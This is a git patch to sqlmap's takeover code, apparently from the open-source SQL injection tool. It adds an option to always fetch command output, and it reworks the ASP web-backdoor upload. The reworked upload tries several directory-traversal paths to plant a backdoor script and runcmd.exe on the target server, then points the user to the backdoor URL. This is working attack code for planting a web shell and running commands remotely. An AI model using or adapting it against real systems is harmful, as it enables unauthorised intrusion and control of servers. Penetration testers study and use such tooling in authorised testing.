From b558712a4741bf0f445982a9770acbeade3643ed Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 25 Feb 2010 11:40:49 +0000
Subject: [PATCH] more feature updates

---
 lib/takeover/abstraction.py | 13 +++++++++----
 lib/takeover/web.py         | 32 ++++++++++++++++++--------------
 2 files changed, 27 insertions(+), 18 deletions(-)

diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index b464abae6..2752bdacd 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -41,6 +41,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
 
     def __init__(self):
         self.envInitialized = False
+        self.alwaysRetrieveCmdOutput = False
 
         UDF.__init__(self)
         Web.__init__(self)
@@ -77,11 +78,15 @@ class Abstraction(Web, UDF, xp_cmdshell):
     def runCmd(self, cmd):
         getOutput = None
 
-        message   = "do you want to retrieve the command standard "
-        message  += "output? [Y/n] "
-        getOutput = readInput(message, default="Y")
+        if not self.alwaysRetrieveCmdOutput:
+            message   = "do you want to retrieve the command standard "
+            message  += "output? [Y/n/a] "
+            getOutput = readInput(message, default="Y")
+            
+            if getOutput in ("a", "A"):
+                self.alwaysRetrieveCmdOutput = True
 
-        if not getOutput or getOutput in ("y", "Y"):
+        if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput:
             output = self.evalCmd(cmd)
 
             if output:
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 6461f961c..0a630adb5 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -169,7 +169,7 @@ class Web:
 
         backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
         backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
-        backdoorContent = backdoorStream.read()
+        originalBackdoorContent = backdoorContent = backdoorStream.read()
         
         uploaderName = "tmpu%s.%s" % (randomStr(4), self.webApi)
         uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
@@ -200,20 +200,24 @@ class Web:
             logger.info(infoMsg)
             
             if self.webApi == "asp":
+                scriptsDirectory = "Scripts"
                 runcmdName = "tmpe%s.exe" % randomStr(4)
                 runcmdStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
-                scriptsDirectory = "Scripts"
-                backdoorDirectory = "%s..\%s" % (posixToNtSlashes(directory), scriptsDirectory)
-                backdoorContent = backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
-                backdoorStream.file.truncate()
-                backdoorStream.read()
-                backdoorStream.seek(0)
-                backdoorStream.write(backdoorContent)
-                if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
-                    self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
-                    self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
-                    self.webDirectory = directory
-                else:
+                backdoorUploaded = False
+                for backdoorDirectoryFormat in ("%s.\%s", "%s..\%s", "%s..\..\%s"):
+                    backdoorDirectory = backdoorDirectoryFormat % (posixToNtSlashes(directory), scriptsDirectory)
+                    backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
+                    backdoorStream.file.truncate()
+                    backdoorStream.read()
+                    backdoorStream.seek(0)
+                    backdoorStream.write(backdoorContent)
+                    if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
+                        self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
+                        self.webBackdoorUrl = "%s/%s/%s" % (self.webBaseUrl.rstrip('/'), scriptsDirectory, backdoorName)
+                        self.webDirectory = backdoorDirectory
+                        backdoorUploaded = True
+                        break
+                if not backdoorUploaded:
                     continue
             elif not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(directory) if kb.os == "Windows" else directory):
                 warnMsg  = "backdoor hasn't been successfully uploaded "
@@ -231,7 +235,7 @@ class Web:
                 self.webDirectory = directory
                 
             infoMsg  = "the backdoor has probably been successfully "
-            infoMsg += "uploaded on '%s', go with your browser " % directory
+            infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory
             infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
             logger.info(infoMsg)